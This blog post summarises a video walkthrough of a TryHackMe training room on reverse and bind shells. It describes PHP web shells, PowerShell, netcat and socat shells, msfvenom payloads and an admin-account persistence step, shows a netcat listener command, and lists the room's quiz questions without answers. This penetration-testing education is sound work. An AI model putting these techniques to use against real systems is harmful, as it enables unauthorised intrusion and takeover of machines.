In this video walk-through, we covered the different types of bind and reverse shells on Windows and Linux for the purpose of penetration testing training.

Introduction to Reverse Shells

 In the simplest possible terms, shells are what we use when interfacing with a Command Line environment (CLI). In other words, the common bash or sh programs in Linux are examples of shells, as are cmd.exe and Powershell on Windows. When targeting remote systems it is sometimes possible to force an application running on the server (such as a webserver, for example) to execute arbitrary code. When this happens, we want to use this initial access to obtain a shell running on the target.

Reverse Shell Stud yNotes

In simple terms, we can force the remote server to either send us command line access to the server (a reverse shell), or to open up a port on the server which we can connect to in order to execute further commands (a bind shell).

We will be covering both of these scenarios in further detail throughout the room.

The format of this room is as follows:

  • The bulk of the room is made up of information, with examples given in code blocks and screenshots.
  • There are two VMs — one Linux, one Windows — in the last two tasks of the room. These can be used to practice the techniques demonstrated.
  • There are example practice questions in Task 13. Feel free to work through these, or follow along with the tasks as you complete them.

Web Shells (Reverse Web Shell)

The first scenario involves creating a simple PHP web shell to be uploaded to a Windows server. Once uploaded, the shell is accessed via a web browser, and commands are executed remotely through the browser by using a cmd parameter.The video demonstrates how to create the web shell, upload it to a target server, and set up a listener using netcat to catch the reverse connection.

Windows Reverse Shell with PowerShell

The reverse shell is obtained by using PowerShell on the target Windows machine to connect back to the attacker’s machine.

A listener is set up with nc -lvp 4545 on the attacker’s machine, and the payload is sent via the browser.Once the connection is established, the attacker can execute commands such as whoami to confirm control over the system.

Privilege Escalation

The video explains how to escalate from a non-interactive reverse shell to a fully-fledged shell, allowing for more comfortable command execution.A new user is created using the net user command, added to the administrators group, and then connected via RDP.

Netcat and Socat Shells

The video covers both netcat and socat shells, demonstrating how to set up reverse and bind shells using both tools.Netcat is easier to use, while socat is more stable but requires manual installation on some systems.Commands for reverse and bind shells are demonstrated using both tools.

Metasploit Meterpreter Shell

The MSFVenom tool is used to create a 64-bit Windows reverse shell payload, which is then uploaded to the target machine.

The multi-handler module in Metasploit is used to catch the reverse connection.Once the connection is established, the Meterpreter shell allows for various advanced interactions with the target, such as privilege escalation and system manipulation.

Staged vs. Stageless Shells

The video explains the difference between staged and stageless shells.

Staged shells send the payload in parts, which is useful for bypassing firewalls, while stageless shells send the entire payload in one go.A stageless shell is created using MSFVenom and demonstrated with a netcat listener.

Linux Reverse Shells

While the video mainly focuses on Windows, it briefly mentions that the same techniques can be applied to Linux.

The user is encouraged to follow the same process for Linux, using PHP web shells, socat, netcat, and MSFVenom, changing the target platform from Windows to Linux.

Room Answers | TryHackMe What the Shell?

Room Link

Which type of shell connects back to a listening port on your computer, Reverse (R) or Bind (B)?
 
You have injected malicious shell code into a website. Is the shell you receive likely to be interactive? (Y or N)
 

When using a bind shell, would you execute a listener on the Attacker (A) or the Target (T)?

Which option tells netcat to listen?
 

How would you connect to a bind shell on the IP address: 10.10.10.11 with port 8080?

How would you change your terminal size to have 238 columns?
 

What is the syntax for setting up a Python3 webserver on port 80?

How would we get socat to listen on TCP port 8080?
What is the syntax for setting up an OPENSSL-LISTENER using the tty technique from the previous task? Use port 53, and a PEM file called “encrypt.pem”
 

If your IP is 10.10.10.5, what syntax would you use to connect back to this listener?

What command can be used to create a named pipe in Linux?

Which symbol is used to show that a shell is stageless?

 

What command would you use to generate a staged meterpreter reverse shell for a 64bit Linux target, assuming your own IP was 10.10.10.5, and you were listening on port 443? The format for the shell is elf and the output filename should be shell

What command can be used to start a listener in the background?
 

If we had just received our tenth reverse shell in the current Metasploit session, what would be the command used to foreground it?

 

Video Walkthrough | TryHackMe What the Shell

Show Comments

MasterMind Study Notes

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles